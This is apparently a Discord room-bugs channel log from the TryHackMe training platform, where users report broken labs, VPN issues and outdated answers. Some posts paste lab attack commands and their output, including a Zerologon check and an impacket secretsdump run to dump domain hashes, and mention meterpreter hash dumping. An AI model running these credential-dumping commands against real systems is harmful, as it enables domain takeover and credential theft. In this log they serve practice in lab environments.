I was wondering why my interface wasn't showing up, that is the root cause of the problem, changing this allowed me to connect.
Which OpenVPN version does it use
ooh smog is a rare user that actually not got openvpn 2.6.0 or later
My AttackBox is currently running OpenVPN 2.4.4
Your AttackBox or the TryHackMe attackbox?
My apologies, the TryHackMe web-based AttackBox
@dusky junco Can you update the OpenVPN version on the AttackBox, please?
huh so that slipped through the cracks
it's fine now, but I saw a bunch of people voting for a reset, I guess they couldn't find the interface and they thought that there was something wrong with the network module instead
exploitingad.ovpn
persistingad.ovpn
Those are screenshots directly from the /root/Desktop/NetworkConfigs directory on the THM web-based AttackBox
Ah pants this is going to be quite a problem, right?
Yes, VPN server update is going to stop users from using the networks
I've got quite a list of changes pending on the AttackBox but I still need to work through them but I'll look into getting an update out just for this
Ah balls
uhm, okay, alright, yeah. I'll work on it and try and get OpenVPN updated into prod ASAP
No problem, please don't stress!
I’m sorry for putting work on you guys on a Friday 
no no, it's not your fault at all 🙂
the link given in the exifdata leads to an older version of cyberchef(?) and gives the wrong output. using the latest version of cyberchef gives the correct key https://tryhackme.com/room/pylonzf
there's supposed to be a website up on port 80 for this room but after waiting 10+ mins and restarting the box 3 times i couldn't get it running https://tryhackme.com/room/islandorchestration
not sure about the version or issue, but this is what i got using the url vs using locally downloaded v10.4 of cyberchef:
Thanks a lot for updating the OpenVPN on the THM AttackBox guys 👍
Also, if it's not too much to ask, is there any plans to update msf on the AttackBox, I've been having sessions drop randomly, usually I run msfupdate on the AttackBox and most of the times it tends to fix the issue, just throwing this out there, it's not time critical or anything just an idea
AFAIK no.
Due the number of older rooms there is in THM.
A high number of older rooms require msf5
Ahhh, forgot about that, no issue at all, thank you 👍
Gave +1 Rep to @quaint sparrow
hey 👋 msf was updated to 6.3.5 a few weeks ago on the attackbox. I haven't heard of sessions dropping out, but happy to look into it. Could you give an example of a room where this has happened so I can try and replicate it please? 🙂
Oh! sorry Ben, I didn't know ( I don't use it) and seen about this in the past. (AoC 2022 IIRC)
Hey! No problem! It was a silent upgrade, so we're just looking out for the repercussions of it
Hi 🙂 I'm trying to solve Investigating Windows 3.x and it seems like sysmon's log file is missing 😦
I turned off the machine and turn it on again, the windows wallpaper ain't even loading 😦
Yeah, no problem, it’s not one specific machine or anything like that. I usually just use meterpreter sessions to dump hashes and download files mostly, it’s just that sometimes when I’m running commands the session would randomly drop on me, it’s not time sensitive or any type of emergency so don’t worry about it too much Ben
Sysmon room Task 10 VM is not booting up
something wrong?
"The requested connection does not exist"
https://tryhackme.com/room/winadbasics
hi guys,
having a big trouble with this room.
The code to reset sophie's password, as suggested by the task, doesn't work and returns an error message: can you please help me out with this?
It's a user error, not a bug.
You have a space between the hyphen and verbose.
- verbose should be -verbose
thank you very much!!!!!
Gave +1 Rep to @quaint sparrow
@green steppe
In version 1.9 of this room the parameter -q (quiet) was changed to -g (greppable).
https://tryhackme.com/room/rustscan
Thanks.
Gave +1 Rep to @green steppe
404 - page not found when clicking link related to target hack (Settlement agreement).
soc level 1 learning pathway > cyber kill chain > practice analysis > "settlement agreement" link.
Good day. Thank you for letting me know. I just recently updated this room to fix some stuff, and for some reason, the VM disappeared. This is now fixed!
Gave +1 Rep to @copper tide
Hello ! i have got a problem with 'vulnversity room. It says i still have one question to answer but when i go in it i already answered all. Thank you for your help 🙂
After talking to you and I went to check mine and realized I have the same issue.
same issue here
Hello all. Hope you are fine
In the room Sysinternals Task 3. It is asked to turn on network discovery. What I did. But after clicking on "save changes", network discovery keeps being on "Turn off network discovery" option. So I can't run \live.sysinternals.com\
Done!
Is there a div tag with a "hidden" property or something?
That'd at least be easy to remedy 😄
in Room "Intro to malware analysis" at task 6: there is no more entry on March 14th for that hash in Hybrid Analysis like the task tells us. Task is not solvable.
Picked up on it, will be resolved soon I guess 🙂
The green start machine button is not showing up in the task anywhere! I am in the room: https://tryhackme.com/room/operatingsystemsecurity#
indeed. the button is missing
@glad badger might help
Hello,
I believe I found an error in the last option of this room:
I've forward this to our team. Thank you for reporting. 🙏
Gave +1 Rep to @waxen cosmos
Remove the spaces? What's the answer format provided like?
operating system security task 3 also does not give the target ip address.When will this bug be resolved ?
it's known to THM. will be fixed
Hey everyone. I'm doing the Operating System Security's room and in the last question I have a bug I can't see the green button "Start the attached machine by clicking on the green “Start Machine” button at the top right of this task".
is known bug. thm staff is fixing it soon
No one is facing this issue ?
not faced it yet as have not done that room yet
Me too
for me this room is completed and in the learning path says that is not completed and don't give me any certificate
ohh thank you, I just open discord now to report this situation. next time I search before in the rooms
Gave +1 Rep to @raw bison
Sure not an issue, still appreciated reporting it 🙂
thanks for your time 🥺
Should be fixed, thanks for reporting 🙂
Gave +1 Rep to @fallow tide
hey yo. i've been trying to redo this room https://tryhackme.com/room/vulnversity but have been encountering problems with directory discovery.
Room URL: https://tryhackme.com/room/intromalwareanalysis
Summary: Provided credentials not accepted by VM
Additional Notes: On Task 4, credentials ubuntu:123456 are provided for accessing the machine. Machine however does not seem to accept the provided password.
it kept prompting this error. i've tried resetting the machine but same error. tried using dirbuster and it also prompted connection refused XD
Hi, In Vulnversity via CompTIA Pentest+ it shows that i didn't finish the room while i finished everything, is that a bug?
does it mean we need wait to a fix?
yeee, sadly
Room URL: https://tryhackme.com/room/burpsuitebasics#
Summary: Incorrect answer for Task 7
Additional Notes: Task 7 (Options) answer to "In which User options sub-tab can you change the Burp Suite update behaviour?" does not accept the correct answer based off Burp Suite Community Edition version 2023.3.5
yeah think the room is a bit outdated
yea, just spotted that the hotkeys question is outdated too
Hey guys, I am having issues with the upload vulnerability room. I try to search the given url: overwrite.uploadvuln.thm like it says, but it wont bring my to any site
Hey guys, not a Bug but potential security issue. I was working on the room "c4ptur3-th3-fl4g" yesterday. In Task 2 there is a hint recommending audacity as a tool. There is a fake website (which was the first google result for me) that's known to spread malware. Domain-grabbing should be considered as a threat imo. Maybe someone of the staff should have a look here.
Hi on room: Post-Exploitation Basics
i'm trying to connect via rdp with the pass P@$$W0rd. in ssh it's ok, on rdp it's not working
Password incorrect via rdp
I already completed the beginner path but the vulnversity room seems bugged... and i can't declare my certification..What can i do for this problem?
Hi, it seems like the bug is due to the Vulnversity room, that, even if completed at 100%, result at 99% in the path.
In fact 3 paths that i've already completed at 100% are now at 99% and Vulnversity seems incomplete even if it is at 100%.
Edit: i saw now that the bug is already attributed at Vulnversity
is there a known issue for the SQL Injection room? I'm on task 6: Blind SQLi - Authentication Bypass. I got the flag but its telling me it's not correct.
nvm, I realize it was the flag for the previous task lol. I had to click on next level to get the new flag.
Is anyone else having issues with the Mr.Robot room badge?
I think this is the best place to post this (if a diff channel is better please let me know)
In the room Ra, you need to installed spark 2.8.3, but it relies on openjdk-8-jre and oracle-java8-jre, but the kali 2023 image does not have access to this older version
So, should an update to the room state that it must be completed using the attack box? I've tried to find an older version and as of right now, I can't seem to find an archived version. The opens I am finding are like update 300 and such which I think is too new for this install
What's the bug?
I've always taken that as
it's [age < 17] If the age is older then they're able to drive, so the code runs.
However, that might not be the approach the room creator was aiming for.
I think they're right?
Yeah, looking at it.
yeah needs to be less than 17 not above
Reported
No the room is right 😆
If age is less than 17, you cannot drive
Elif age is more than 17, you can
Thanks to Munra
introtodocker room (NEW) icon is small/bugged
It looks adorable ngl
The room is wrong no?
Yep, that's wrong
How the heck did that go unnoticed
it happens 😄
sure but that room is pretty old
@hazy tiger i was talking about the sentence in the ( )
tbh when I solved that room I didn't read much as I was already good at python, I was just moving down and solving, I bet some people noticed but never reported
(age is above 17)
It’s important you explain bugs when you post them^
yup i was busy sorry
See it say if the Condition age < 17 is true ( age Above 17) the Code inside the if statement is gonna run
which is the opposite thing
Basically it says if age < 17 in other word ( age ABOVE 17 ) the Code inside the if statement is gonna run
and it suppose to be ( AGE Less than 17 )
got it yet?
we got it...yes
I am Decent with python too but since the Sentence was Highlighted with ( ) so..
Thanks Jay ❤️
Gave +1 Rep to @placid abyss
Vulnversity is bug? I just answered all the questions but I can't complete the room (95%), I've repeated the room twice
it's a bug, yes, they're working on it #1092490706385383524
Yo, I think the Burp: Repeater room is broken
how so?
So in Task Nr. 7 the goal is to trigger a 500 status code
But it doesn't give me a flag. I tried everything and after reading in a walk through I realized that not even the input that was used in the walk through worked for me
Its always:
500
No entries found with that ID
And in the walk through it says
500
FLAG
What payloads are you trying? Could you share a screenshot of what you are trying… maybe I can help 🤷♂️
I can give u the payloads I tried. I don't have discord on my laptop so I don't prefer screenshots
Payloads I used:
0
-1
6
999
9999999999999999
'
!
You could just use discord through your browser…
Oh, didn't think bout that. Okay, if U wish I'll create some screens
Okay, for some reason the site doesn't load anymore. I'll be back, when it works again -.-
Just found a (relatively) unintended privesc in the WWBuddy room, you can bypass the lateral privesc to jenny and go straight to root
@timber bone I can send you a guide on how I did it if you'd like
Sometimes things like that are fixed on relaunch of the target machine. @wheat fractal
Hello, in the left pane you can find Windows PowerShell under OpenSSH
Question, I have a buddy I do these rooms with, and he noticed that most rooms can be completely bypassed and gain root via the pkexec, is this normal/intentional? Or should the older rooms be patched so this can't happen (since it's technically cheating)
Hey everyone. I'm doing the Operating System Security's room and in the last question I have a bug when i enter the ssh command and put the password the output is Permission denied, please try again. I really don't understand I read everything and did step by step but ...
Hi guys i was doing vulnversity room on try hack me with my mobile phone using termux and I had completed half of it but after I connect the openvpn and tried to visit the webserver which was running on port 3333 I was getting an error I had even cross check that I connected to the VPN and everything was working fine but that error was still showing please help me
There are several older rooms that are subject to new exploits.
Its encouraged to still trying to do them in the way the guide intends to learn the experience.
Especially since in the field, you're likely to find high profile CVEs like that are more miss than hit.
What was the error?
Did you take a screenshot?
You can always confirm your VPN status with curl http://10.10.10.10
You can send it if you want 🙂
The error was:
'Unable to connect' after waiting couple of minutes, and when first time I can ping and also getting response but after sometime I won't getting the responses as well
hello i got an issue everytime i start the machine and the ip was given i cant do anything with that ip i cant ping or do nothing , so i cant do any hack cause the ip not working
you need to either connect to the vpn using openvpn or use the attackbox to access the ip
can you do curl 10.10.10.10/whoami ??? because if that returns an ip the vpn is working as intended if not there is a troubleshooting process to go through
ty
Hello all, in the room (Soc lvl1 path) Threat Intelligence Tools on Task 7 I cannot use the data on the attached VM. Cannot download them as well
Have 2 issues with the website:
- Cant complete "vulnversity". When i click on it i am stuck in constant "Loading..."
- Cant complete lab in "zer0logon" i run the commands for task 4 and get this output:
```
(impacketEnv) root@ip-10-10-34-167:~# python3 zero.py DC01 10.10.197.170
Performing authentication attempts...
Success! DC can be fully compromised by a Zerologon attack.
(impacketEnv) root@ip-10-10-34-167:~# ~/impacketEnv/bin/secretsdump.py -just-dc -no-pass DC01$@10.10.197.170
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[-] RemoteOperations failed: SMB SessionError: STATUS_LOGON_FAILURE(The attempted logon is invalid. This is either due to a bad username or authentication information.)
[*] Cleaning up...
(impacketEnv) root@ip-10-10-34-167:~#
```
For issue #1 see #1092490706385383524
thats not the issue...
The room isn't loading != room not showing as done
I need enough sleep :\ my bad
for issue #1 could you try to clear browser cache/try another browser?
I just opened it and it's working for me
Done!
Hello All,
I am in Windowsprives20 room, task6 (https://tryhackme.com/room/windowsprivesc20), it talks about abusing SeBackup Privilege
```
C:> whoami /priv
PRIVILEGES INFORMATION
Privilege Name                Description                    State
============================= ============================== ========
SeBackupPrivilege             Back up files and directories  Disabled
SeRestorePrivilege            Restore files and directories  Disabled
SeShutdownPrivilege           Shut down the system           Disabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
```
as per the output the SeBackupPrivilege is DISABLED , is it supposed to be enabled to be able to exploit this ??
if yes then the screenshot attached to this task should be changed
So, windows privileges are weird.
Even if they're disabled, you still actually have them, you just need to enable it
If you truly don't have that privilege, it won't be displayed
https://tryhackme.com/room/ret2libc Task 1 room links are private, specifically
https://tryhackme.com/room/ccghidra
https://tryhackme.com/room/introtox8664
This a community room. @silver turret is this your room?
yep, should I remove them?
or what does it mean if they are private?
In this case, it means the room has most likely been retired/it is out of date. I'd remove them or replace them with URLs to content that you think is relevant on the search page i.e. https://tryhackme.com/hacktivities?tab=search&page=1&free=all&order=most-popular&difficulty=all&type=all&searchTxt=reverse
Okay, got it, thanks
Gave +1 Rep to @dusky junco
Both rooms have been retired. 🙂
for the throwback network - I am having an issue on timekeep.throwback.local where after resetting the user's password, I login and just get a blank page. My pivoting configuration is working because I have compromised DC, and can access the initial login page of timekeep but cant login for further enumeration. if there are logs or commands I am using that I can provide I will. I have reset the lab all ready and can confirm that I have by having to reset my SSH fingerprint.
It's updated. Should be okay now 
yup! Thanks!
Gave +1 Rep to @silver turret
i have a problem with the new room capture
i tried all possible usernames and all of them returned this user doesn't exist
Room bugs
Room URL: https://tryhackme.com/room/vulnversity
Summary: [Outdated room content]
Additional Notes: Same the end this room, stay with status not completed. Don't end the room, same 100%
This is a known issue to the team.
👋
Anywhere/way to report:
- typos in hint-patterns
- outdated/incorrect room answers
Here.
https://tryhackme.com/room/windowsforensics1, Task 9: Q2 Answer pattern ******** **** ******** *.* *** ****** should be ******** ************ *.* *** ****** (extra space, not in the screenshot w/ the answer)
(Another submission once I've confirmed the info 👍 )
That'd be a site bug, those are auto generated
If so, it's probably also expecting a space in the answer, which is (also) incorrect
Enter the answer and refresh the page, see what the "true" answer it's expecting is
After checking, the answer pattern is correctly aligned with the expected answer. 🙂
I just submitted the answer in the format I expect (without the space) and it was accepted...?
Answer tolerance, if it’s 95% right, it will be accepted
Very interesting feature!
So sounds like the expected answer could use an update (@glad badger confirmed the pattern matches the expected answer) - Where to send/post screenshots?
The expected answer is the correct answer. No update is needed. 🙂
The correct answer doesn't have that extra space (5 words, not 6)
Room: Subdomain Enumeration
Task 6 - Virtual Hosts
The first subdomain found is "api"
The next one found is accepted as answer for first question.
Can't say if false positive because all three subdomains found don't resolve properly (added entry to /etc/hosts. acmeitsupport.thm resolves just fine, none of the subdomains do)
IIRC, this isn't a bug, if you use the attackbox the correct name will show up first.
it's not a bug but i didn't find the right place to report this so
it's just a little orthography error
Which flag is wrong?
No, the flag isn't wrong.
There is a high probably chance you're entering the wrong character. (this one isn't a great one to copy from)
Now I see what you mean. Will have to look at it later today. 🙏
@misty gull I tried submitting without the space and it did work, but after refresh the actual correct answer will be replaced in the box and that answer has a space which means the author has put it with a space if I am not wrong
Sounds consistent with:
#room-bugs message and #room-bugs message
Indeed 👌 just wanted to clarify my thoughts on this :D
because I had similar concerns, see #site-bugs message
I am not sure if this is a bug or just me misunderstanding it. The task picture does not match the actual permissions of the file.
Room is:
Windows Fundamentals 1
i think this should be modified..
for this question the script name needs to have ".nse" short for Nmap Script Engine
wait hold on
nvm it worked lol
Room = Burp Suite: The basics
Task 7 - answer MISC is not up to date with current attack box version of burp. I had to look up the answer as MISC settings is no longer at play
Morning. Would this be the right place to get help on a problem with one of the VMs in a room im having issues with?
What's the problem?
To get more accurate help.
Please state the room ( & task, if relevant)
Jr Penetration Tester > File Inclusion
Error response
Error code: 405
Message: Method Not Allowed.
Error code explanation: 405 - Specified method is invalid for this resource.
This isn't a bug.
That's the error message whenever i try to load the website for any of the labs
You're trying to load up the website of the attackbox.
i am
You need to load up the IP in this link, when you press the green Start machine button.
When you press the green button, the ip will populate from the ip shown in the red box.
No worries!
This is the case for the majority of room tasks.
Some will open a separate split screen machine.
yup i got it to load the page now
damn it, sorry about that. Clearly i need more coffee LOL
thank you!
Is this supposed to be port 21 or why does it say 20?
FTP is used on 20 and 21.
Port 20 is used to send the files between the server and the client.
ty so much
Gave +1 Rep to @quaint sparrow
So Port 21 for Control Channel and port 20 for Data Channel right?
Remember that it won't always use 21/20, same with other services - its just the "standard"
Hi! I'm starting the Linux Fundamentals course and started up the Ubuntu VM. I tried whoami and what was returned is root, but that answer was showing up as incorrect. I had to google it and found the correct answer, please see screenshot. Maybe I did something wrong when booting up the VM?
Linux Fundamentals which part?
linuxfundamentalspart1
You started the AttackBox instead of the target machine. 🙂
you need to start the machine in task 3
ah that makes sense! Thanks for the help. I thought I might have done something wonky 😅
it's alright, always look for the machines in the tasks, the majority of the time you will need to interact with them from the AttackBox or your VM, but sometimes they start as a separate machine in your browser
Has anyone else had an issue with "Ra" where the spark messenger .deb image could not be downloaded on kali?
What error do you get?
When trying to install with sudo dpkg -i spark_2_8_3.deb:
```
dpkg: regarding spark_2_8_3.deb containing spark-messenger, pre-dependency problem:
spark-messenger pre-depends on openjdk-8-jre | oracle-java8-jre
openjdk-8-jre is not installed.
oracle-java8-jre is not installed.
dpkg: error processing archive spark_2_8_3.deb (--install):
pre-dependency problem - not installing spark-messenger
Errors were encountered while processing:
spark_2_8_3.deb
```
Have you tried doing what the error says?
Have you pressed the start machine button?
Can you send a screenshot?
That's the ssh you've to access.
You see that, right?
Then you haven't started the machine.
Press the green button.
No, you started the attackbox.
That's a separate machine.
Yes, I am unable to install the dependencies since these packages cannot be found on kali. I was able to install spark on the attackbox, however there was another issue that led to it crashing constantly.
Hello, I think the empire room needs to be reviewed and updated. I have spent a considerable amount of time trying to install. First off, the current release of empire does not have an appimage. I went with an older one but the ./empire --rest command does not work, it just says permission denied. I tried changing it to an executable; it is a dir. I'm stuck
OWASP Top 10 - 2021
Web services aren't reliable. I'm able to establish a TCP connection but the webserver does not answer. Terminating and restarting machines doesn't fix it
Room: Daily bugle
Apparently there's some backend version mismatches which invalidate majority of the exploits.
Details:
https://github.com/rapid7/metasploit-framework/issues/14149#issuecomment-1161947582
On a side note the one python script that was supposed to work is of an unknown python version, and I'm getting a weird str-bytes concatenation error with python3.11. Looking to fix that...
Solved the python issue.
In the relevant python script: ||change line 46 to value.decode()||
At least users and hashes are getting dumped. Can't get session to work properly yet.
hello, has anyone had any issues with Vulnversity? I've completed the room previously and now its showing that I still have progress to complete. However looking at the room questions everything is completed.
here's what my dashboard shows
It's a known bug, they're working on it #1092490706385383524
having the same. came here to check for it. Vulnversity not showing as done
hello, everyone. I can't connect to the VPN. Why?
2023-05-11 16:45:23 --cipher is not set. Previous OpenVPN version defaulted to BF-CBC as fallback when cipher negotiation failed in this case. If you need this fallback please add '--data-ciphers-fallback BF-CBC' to your configuration and/or add BF-CBC to --data-ciphers.
2023-05-11 16:45:23 OpenVPN 2.5.7 x86_64-pc-linux-gnu [SSL (OpenSSL)] [LZO] [LZ4] [EPOLL] [PKCS11] [MH/PKTINFO] [AEAD] built on Jul 5 2022
2023-05-11 16:45:23 library versions: OpenSSL 3.0.5 5 Jul 2022, LZO 2.10
2023-05-11 16:45:23 Outgoing Control Channel Authentication: Using 512 bit message hash 'SHA512' for HMAC authentication
2023-05-11 16:45:23 Incoming Control Channel Authentication: Using 512 bit message hash 'SHA512' for HMAC authentication
2023-05-11 16:45:23 TCP/UDP: Preserving recently used remote address: [AF_INET]54.194.161.223:1194
2023-05-11 16:45:23 Socket Buffers: R=[131072->131072] S=[16384->16384]
2023-05-11 16:45:23 Attempting to establish TCP connection with [AF_INET]54.194.161.223:1194 [nonblock]
can you give some more info on this?
I seem to have bug on task 4 of https://tryhackme.com/room/zer0logon
I run commands but get outdated python error??
(impacketEnv) root@ip-10-10-86-33:~# python3 zerologon_tester.py DC01 10.10.222.219
Performing authentication attempts...
Success! DC can be fully compromised by a Zerologon attack.
(impacketEnv) root@ip-10-10-86-33:~# python /opt/impacket/examples/secretsdump.py -just-dc -no-pass DC01$@10.10.222.219
/root/impacketEnv/lib/python3.6/site-packages/OpenSSL/_util.py:6: CryptographyDeprecationWarning: Python 3.6 is no longer supported by the Python core team. Therefore, support for it is deprecated in cryptography. The next release of cryptography will remove support for Python 3.6.
from cryptography.hazmat.bindings.openssl.binding import Binding
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[-] RemoteOperations failed: SMB SessionError: STATUS_LOGON_FAILURE(The attempted logon is invalid. This is either due to a bad username or authentication information.)
[-] init() got an unexpected keyword argument 'ldapFilter'
[*] Cleaning up...
(impacketEnv) root@ip-10-10-86-33:~# python3.9 /opt/impacket/examples/secretsdump.py -just-dc -no-pass DC01$@10.10.222.219
Impacket v0.10.1.dev1+20230316.112532.f0ac44bd - Copyright 2022 Fortra
[-] RemoteOperations failed: SMB SessionError: STATUS_LOGON_FAILURE(The attempted logon is invalid. This is either due to a bad username or authentication information.)
[*] Cleaning up...
(impacketEnv) root@ip-10-10-86-33:~#
Hello everyone!
I have trouble in Credential Harvesting room from task 6
According to the room this should work, but it does not. I have no idea why this is happening. I have done what the room taught and followed everything one by one, then I got stuck at this
hello, is it just me or is Vulnversity impossible to complete?
Not impossible, there is a bug, it's in #1092490706385383524
Unable to terminate machine in Relevant room. It will say "terminated", but if I refresh, it then says the machine is still active
In the room "WindowsServerEventlogs" The commands to pull logs are no longer accurate to the VM attached to the Room. on task 5 the command "Get-WinEvent -Logname Security -FilterXPath '*/EventData/Data[@Name="TargetUsername"]="Sam" and */System/EventID-4720'" is correct for Question 2, but doesn't work in the VM.
In the room Walking An Application i found a flag that can't be submitted 😄 - literally tried the flag to all input fields and none of them got a "correct flag"
-- When you launch the room, open the network tab in debugger tools and open for example the customers page there is a X-FLAG parameter in the Response Headers. It's a valid flag format THM{xxxxxx_xxxx} - is that a bug or a feature?
It could be a flag for a different room/question
Hey, checkout #room-bugs message
I'm sorry, I didn't check that one before posting
No worries, to answer your question it is a flag for another room that uses the same material
Thank you
Is it only me who can't seem to load the Vulnversity room webpage when I'm logged in?
I've been here for a while
Try clearing cookies/cache
I've tried this on different browsers, in private windows each, but the result is the same.
Funny someone else is having issues with vulnversity. I am stuck at 95% completed for the room even though all tasks/flags have been completed.
That's a #1092490706385383524
Would have been nice if the ticket i submitted mentioned that. They literally just closed it and said it was resolved.
same here - submitted a bug but it seems like its known about already
"Vuln university" room in pentest+ path isn't showing complete, even after completing it.
#1092490706385383524 staff is aware, they're working on it
Think the vulnversity form complete.js file has a broken link
Vulnversity is a #1092490706385383524
also when I am opening a section/task in the room it gives the view from the end of that task rather than the starting paragraph.
if I am currently in a task, and if I want to look into the next task without shrinking the opened task,
then the new task will open with the starting view at the end section of that task and not from the starting paragraph
hello, I have some issues in deploying machine in Investigating with splunk room. Is not opening the right one. How I can access it using the VPN?
thank you, James!
Gave +1 Rep to @eternal summit
The VM in Task 7 of Intro to Docker doesn't start. The split screen never opens. Sometimes a pink message about problems pops up. It's been that way for at least 25 hours
in OWASP top 10 2021 please make joseph's password reset ignore case. I went through 50 colors then looked up the answer and it's like my 4th answer but it's case sensitive :/
OWASP TOP 10 2021 is new? I've done the total beginner path
but it looks like i have to do it again
Yes, it's not a bug, it's a brand new room, and replaced the old one in the path
thanks and cheers !
Hi guys and ladies.
I wonder if everything is ok with Linux Privileges Escalation room? Today I started with 'Privileges Escalation: Path' task and see no split screen when I started target machine. It's probably ok if I could connect to target machine from Attack Box however it won't start also (got the message that it still loading).
UPD: it's ok now, probably was some glitch
Who can I dm to speak about a port in a private room that are closed that should be open. Spoke to the author too and he said the port should be open as well 😅
This channel.
Well it's room /developersrus and the port 25 should be open. Seems to be broken atm though
Hi I am in the "Wireshark: The Basics" Room and the answer is not showing properly for me (the alien's name). Not sure if it is just for me.
Hello! I am in the FowSniff CTF room and the machine is super slow when I scan open ports It doesn't finish in 1 hour
And the machine keeps freezing
OWASP JUICE SHOP task 7: attached shows it states to go to "headers tab", there actually isn't a headers tab anymore on burpsuite
Hi. Exploiting Active Directory network is down. I think it goes to sleep but the system thinks it is working.
I'm having same problem
hello
I have 2 tickets opened for the Vulnversity room because it is missing a question and it doesn't let me finish any paths, and both were closed by "Jabba" as being resolved although the issue is still present. Is anyone really looking into these bugs?
thanks, @quick violet . I can't understand why they are marking the ticket as being resolved, not mentioning anything in the ticket if this is a known issue. 🤦♂️
Gave +1 Rep to @quick violet
Read my message @wheat fractal
We have over 1000 tickets, as stated in my message, we are closing all active tickets regarding the bug
We can’t keep everyone updated
by reading your answer @hazy tiger , I'm 99% sure you won't take this as feedback, but I'll try it for that 1% chance: while I understand that you cannot update each ticket individually with a custom message, closing a ticket as being resolved when it is in fact not resolved signals a complete lack of respect for the person taking their time to report a bug. if you don't have the manpower to update each ticket you can leave it open until it is actually fixed. and I know your pain because I too am a developer, a manager, and in this case a paying customer.
and I did read your messages, that is why I was frustrated that the tickets were closed as resolved.
I’m not sure I understand the frustration? If you knew it was going to be closed and marked as resolved regardless of the bug state 🙂
because as a developer myself and a team lead I am not closing a bug report until it is either fixed, no longer a bug due to removed functionality or I am removed from the project. anything else for me means another vulnerability in my project and, as I mentioned previously, a lack of respect for the bug reporter's time. maybe I am one of those dying breeds who actually thinks a bug report status needs to reflect the actual state of the bug. 🙂 🥺
Might have solved all this by marking it as duplicate if that's an option.
Though you have to also keep in mind that the team is trying their best to maintain the tickets, I am sure it's not just Jason who's handling them, you're talking about ~2M registered users, many of them do open tickets daily so we shall also appreciate their hard work maintaining this.
That's just my opinion
I understand that 100%, the problem is that this isn’t a bug ticketing service, it’s a support chat service.
Your support is over when I tell you that the issue has been reported. This is why in my message I state that we can’t keep everyone updated and that your ticket will be closed.
We’re discussing internally how we can better handle site-bugs, I’ll bring this issue up on my next call and see what we can do.
I never intended any disrespect or to minimize anyone's work. I started as a support technician and I know the life pretty well. That also doesn't go against what I was saying. That is why I mentioned this is trying to be feedback, not shaming.
I appreciate it, @hazy tiger
now I have some closure knowing that someone is still looking into this issue 🙂
Fair enough 👍
Hi, in "burpsuiteintruder" Task 12 the GIF isn't correct anymore. Macros are found under settings > sessions > macros instead of the navbar in the main screen.
Hi, I have recorded my screen because you have some bug with the remote access for the Windows laptop. Where can I send it to you in order to explain the problem?
You would have to verify first in order to send screenshots in here 🙂
!docs verify
Hello guys,
There is no data in the Splunk 2 Room
https://tryhackme.com/room/splunk2gcd5
I've restarted the machine 2 times but there is no data
i just restarted it again and now it's fine
I finished the room but it was not approved
I want the certificate. It's showing 100%, but the Vulnversity room is not solved. Why??
This is a #1092490706385383524 to the team.
In task 7 the imgur image appears to be broken
does the Sudo Security Bypass lab work??
┌──(kali㉿kali)-[~]
└─$ ssh -p 2222 tryhackme@10.10.9.118
Connection closed by 10.10.9.118 port 4444
normally it should be open
Can it be from me?
Redline room, there are links to IOC Editor, none are working. It seems it was only used til windows 7. Maybe disable link and mention and change it to the new https://fireeye.market/apps/211404 , OpenIOC Editor, working from windows 10
Hello, I'm on the machine "jumpbox", is that normal that the port 80 is filtered?
Hi #room-bugs , it appears VulnNet: Roasted is not available on VPN (works on attack box).
Can you send a screenshot of your OpenVPN output, please?
@hazy tiger I think you mean this? I've included the attack box nmap vs local too
(the curl test was junk because it looks like 80 isn't open)
Everything looks fine, can you wait for the nmap scan to finish and see if it returns similar ports at the AttackBox? 🙂
so, it already doesn't (you can see the 'host seems down').
Host seems down is a Windows quirk
It doesn't respond to certain tests nmap uses to check if a host is up
Hence why we use -Pn (as per the suggestion) as it skips the host testing phase and goes straight to port testing
Obviously on the AttackBox we don't use this but it's best to wait and see
if you see on the screenshot, -Pn wasn't passed on the attackbox nmap scan
ok....
WAIT! It worked now?! 🙂

ok, here's the proof. nevermind then, thanks!
Hey, there is a problem with the "OWASP Top 10 - 2021" Room. For task 17 you need to visit IP:8088. However, the website does not really respond. After waiting more than 2 minutes I saw a login screen. When trying to register an account, the website is loading for a long long time. I think something isn't working correctly. I have this issue on both the Attackbox (non subscriber) and from my own machine via VPN.
Is this because the webserver is trying to resolve google fonts etc. and without subscription there is no internet?
Edit: The same issue applies for Task 22
Hey @hazy tiger actually, it does seem broken. Machine stopped responding and I wondered if I'd hit some tripwire so restarted. 30 mins later, still not responding to nmap.
Is it responding on the AttackBox?
checking....
Ah, looks like I've hit my daily limit (although, I'm not quite sure how!) so I can't confirm that. I suspect yes (as last time it was when it wasn't over vpn)
One sec
@dusky junco Looks like this machine has the Windows timeout bug?
Looks like the services are coming back as filtered
@hazy tiger I think I'll leave it with you and move on to another box for now. Hope you can fix it though as my windows enumeration skills are in need of training! 🙂
Thanks for taking a look 👍
Mhhm, i'd expect the machine to be shutting down entirely after an hour if that's the case.
I'll have to have a proper look on our side. Might get a chance to look in the rest of the afternoon 👍
No problem:)
I suspect the velociraptor room (/room/velociraptorhp) broke recently. If I do not misunderstand this error, a certificate ran out ~two days ago.
In the attached Windows VM. This error comes up when trying to start velociraptor in the ubuntu shell using the command provided by the text file on the Desktop.
Hey @keen sluice I'm aware of this. Done some looking into it, unfortunately it's not a quick fix as I hoped. Setting some time aside next week to look into this. I'm going to set the room to private/adding a note into the room in the meantime as it's currently incompletable. But yup, TLDR, you're right - but it's not a case of simply regenerating the SSL cert unfortunately 😦
I've figured out the problem. Need to resolve on our side I won't get a chance until next week likely
cc @midnight pawn
Thanks for the quick info, good luck on fixing it.
Gave +1 Rep to @dusky junco
Room: https://tryhackme.com/room/velociraptorhp isn't working. The certificate has expired for Velociraptor inside the VM.
This is nothing like the image in the room after following the very basic instructions. Please look at the last message and the time error message.
Hey @unreal bough I'm working on resolving this 🙂 thanks for the report #room-bugs message
Gave +1 Rep to @unreal bough
Brilliant, thanks for the very quick response.
Gave +1 Rep to @dusky junco
Hi, I'm on the room: Threat Intelligence Tools, task 5, question 4. I try to go to the website CyberChef but it doesn't go to the website. I connect with the VPN and on the machine the internet is not working. I tried to locate CyberChef on the machine but it's not there
How I can solve it?
This is not really a bug with the room
Only subscribers have internet access from their attackboxes
it is not an attackbox james
it is a split view target machine
so yeah it should never have internet access
Open a new browser tab. Use Copy/paste.
the problem is there is no local copy of cyberchef so to solve said question you have to copy a kinda "sketchy" ip out of the target machine and into your hosts copy of cyber chef
as you are handling emails with known malicious files in this room
if you can't see how that could be bad and cause problems shadow dunno what to tell you james
What's wrong with copying and pasting an IP address?
You're not going to get hacked by having a string of numbers in your copy list
